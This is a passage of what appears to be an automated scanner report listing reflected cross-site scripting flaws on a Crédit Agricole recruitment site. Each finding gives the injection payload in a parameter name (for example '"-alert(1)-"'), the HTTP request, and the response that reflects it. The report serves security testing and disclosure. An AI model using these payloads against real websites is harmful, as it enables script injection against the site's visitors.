Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Persona
...[SNIP]...
Recruitment Group";
var SharingBaseTitle = "Personal development - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_personal.php?b84fa"-alert(1)-"49fbafa66=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.88. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_recruitment.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea5"-alert(1)-"d5aa454ad92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_recruitment.php?b6ea5"-alert(1)-"d5aa454ad92=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:02 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:02 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Recruitment - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_recruitment.php?b6ea5"-alert(1)-"d5aa454ad92=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.89. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_recruitment.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7db"><a>10865c1fb0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_recruitment.php?9b7db"><a>10865c1fb0f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:37 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:37 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_recruitment.php?9b7db"><a>10865c1fb0f=1" />
...[SNIP]...

1.90. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_remuneration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 899af"><a>a74135578ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_remuneration.php?899af"><a>a74135578ff=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Remuner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_remuneration.php?899af"><a>a74135578ff=1" />
...[SNIP]...

1.91. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_remuneration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88bb6"-alert(1)-"9f80076c8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_remuneration.php?88bb6"-alert(1)-"9f80076c8f4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Remuner
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Remuneration - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_remuneration.php?88bb6"-alert(1)-"9f80076c8f4=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.92. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 585ed"><a>0b0d2ff5e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.php?585ed"><a>0b0d2ff5e91=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/index.php?585ed"><a>0b0d2ff5e91=1" />
...[SNIP]...

1.93. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79244"-alert(1)-"970a6abbe6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php?79244"-alert(1)-"970a6abbe6a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:44 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:44 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
ngBaseTitle = "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/index.php?79244"-alert(1)-"970a6abbe6a=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.94. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /innovation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29274"-alert(1)-"3567013046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /innovation.php?29274"-alert(1)-"3567013046f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Innovat
...[SNIP]...
nnovation - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Innovation - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/innovation.php?29274"-alert(1)-"3567013046f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.95. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /innovation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8989"><a>05bc715427c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /innovation.php?b8989"><a>05bc715427c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Innovat
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/innovation.php?b8989"><a>05bc715427c=1" />
...[SNIP]...

1.96. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /jeunes_diplomes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e1e"-alert(1)-"3c889b37878 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jeunes_diplomes.php?91e1e"-alert(1)-"3c889b37878=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Jeunes Dipl..m..s - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/jeunes_diplomes.php?91e1e"-alert(1)-"3c889b37878=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.97. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /jeunes_diplomes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef3c"><a>779b06646e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jeunes_diplomes.php?6ef3c"><a>779b06646e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/jeunes_diplomes.php?6ef3c"><a>779b06646e0=1" />
...[SNIP]...

1.98. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a7e"><a>cf4ba7c431c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news.php?70a7e"><a>cf4ba7c431c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 94489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>News -
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/news.php?70a7e"><a>cf4ba7c431c=1" />
...[SNIP]...

1.99. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5d2"-alert(1)-"0301e223885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news.php?dc5d2"-alert(1)-"0301e223885=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 94510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>News -
...[SNIP]...
SharingTitle = "News - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "News - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/news.php?dc5d2"-alert(1)-"0301e223885=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.100. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /search_result.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea2bf"-alert(1)-"bc55bac250f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search_result.php?ea2bf"-alert(1)-"bc55bac250f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 50790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Search
...[SNIP]...
ult - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Search result - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/search_result.php?ea2bf"-alert(1)-"bc55bac250f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.101. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /search_result.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d62"><a>cb51436b59a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search_result.php?a6d62"><a>cb51436b59a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 50769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Search
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/search_result.php?a6d62"><a>cb51436b59a=1" />
...[SNIP]...

1.102. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57da5"><a>c60d3a2d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.php?57da5"><a>c60d3a2d76e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 58992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/sitemap.php?57da5"><a>c60d3a2d76e=1" />
...[SNIP]...

1.103. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /sitemap.php

Issue detail

